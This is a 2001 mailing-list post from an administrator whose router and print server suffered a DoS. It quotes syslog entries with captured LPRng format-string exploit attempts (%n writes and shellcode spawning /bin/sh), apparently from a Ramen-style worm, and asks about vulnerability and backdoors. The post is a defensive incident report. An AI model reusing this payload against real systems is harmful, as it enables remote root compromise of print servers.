On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Hi all, that's what I found in my logs after I had to reboot my Router, which also worked as print server (Now I know better) because of a DoS. Nov 21 03:29:36 lan1 -- MARK -- Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BB����������������XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n1�1�1��F��1Ҳf�1��C]�C]�KM�M��1�E�Cf]�f�E�^O'M�E�E��E�^P�M���CC��C��1ɲ?�� �A��^X^u^H1�F^GE^L�^K�M^HU^L������/bin/sh' Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB(���)���*���+���XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1 92u%303$n1�1�1��F��1Ҳf�1��C]�C]�KM�M��1�E�Cf]�f�E�^O'M�E�E��E�^P�M���CC��C��1ɲ ?���A��^X^u^H1�F^GE^L�^K�M^HU^L������/bin/sh' Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH (and so on) - the lpr.log shows the same entries. I searched the system for fragments of the Ramen worm after reboot but I found nothing suspicious. The attack seemed to come over nmbd, although all ports, exept inetd are blocked to the outside vi ipchains. I had a number of rejected packets to port 137 immediately before, nmbd crashed and the lprng exploit started. So there are some questions, I would like to pose : Is Woody's lprng still vulnerable ? I've got the latest version. Is the shown exploit a sign that someone already was in there, or just for an attempt ? Can I find possible backdoors, or will I have to re-install ? Thanks, -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t =8csx -----END PGP SIGNATURE----- -- Things are more like they are today than they ever were before. -- Dwight Eisenhower -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
